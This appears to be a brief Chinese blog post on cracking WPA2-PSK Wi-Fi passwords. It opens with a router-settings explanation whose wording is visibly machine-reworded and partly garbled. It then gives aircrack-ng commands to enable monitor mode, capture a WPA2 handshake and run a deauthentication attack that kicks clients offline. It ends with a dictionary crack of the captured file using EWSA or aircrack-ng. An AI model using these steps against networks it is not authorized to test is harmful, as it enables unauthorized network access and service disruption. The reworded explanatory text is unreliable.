破解WPA2-PSK加密
创始人
2024-01-30 19:21:49
0次
破解WPA2-PSK加密
-
WPA/WPA2与WPA/WPA2-PSK的区别
- WPA/WPA-2
WPA/WPA2是一种比WEP强壮的加密算法,挑选在这种安全类型,路由器将选用Radius服务器进行身份认证并得到密钥的WPA或WPA2安全形式。因为要架起一台专用的认证服务器,价值对比贵重且保护也很杂乱,所以不推荐普通用户运用此安全类型。
- WPA-PSK/WPA2-PSK
WPA-PSK/WPA2-PSK安全类型其实是WPA/WPA2的一种简单化版别,它是依据同享密钥的WPA形式,安全性很高,设置也对比简单,适合普通家庭用户和小型企业运用。其详细设置项见下图所示:认证类型:该项用来挑选体系选用的安全形式,即主动、WPA-PSK、WPA2-PSK。主动:若挑选该选项,路由器会依据主机恳求主动挑选WPA-PSK或WPA2-PSK安全形式。加密算法:该项用来挑选对无线数据进行加密的安全算法,选项有主动、TKIP、AES。默许选项为主动,挑选该项后,路由器将依据实践需求主动挑战TKIP或AES加密算法。留意11N形式不支持TKIP算法。PSK暗码:该项就是WPA-PSK/WPA2-PSK的初始密钥,在设置时,需求为8-63个ASCII字符或8-64个十六进制字符。组密钥更新周期:该项设置播送和组播密钥的定时更新周期,以秒为单位,最小值为30,若该值为0,则表示不进行更新。
-
使用Aircrack-ng抓取WPA2-PSK握手包
主要步骤:
1:设置无线网卡至监听模式 airmon-ng start wlan0
2:扫描周围WPA2-PSK加密的无线信号 airodump-ng wlan0mon
3:新建一个终端,抓取握手包 airodump-ng -c [num] -w wpa2 wlan0mon 需指定信道
4:等待过程,可以发起DeAuth攻击,强制将客户端踢下线重连,抓取握手包aireplay-ng -0 5 -a BSSID -c STATION wlan0mon 设置为发起5次攻击可能会出现信道不同的提示,需重复执行
5:等待监控窗口,提示WPA handshake
-
使用EWSA破解密码
主要步骤:
1:验证有效性
2:加载字典,执行破解
3:可选择GPU加速
4:也可直接使用aircrack-ng破解 aircrack-ng -w dic wpa2-01.cap
相关内容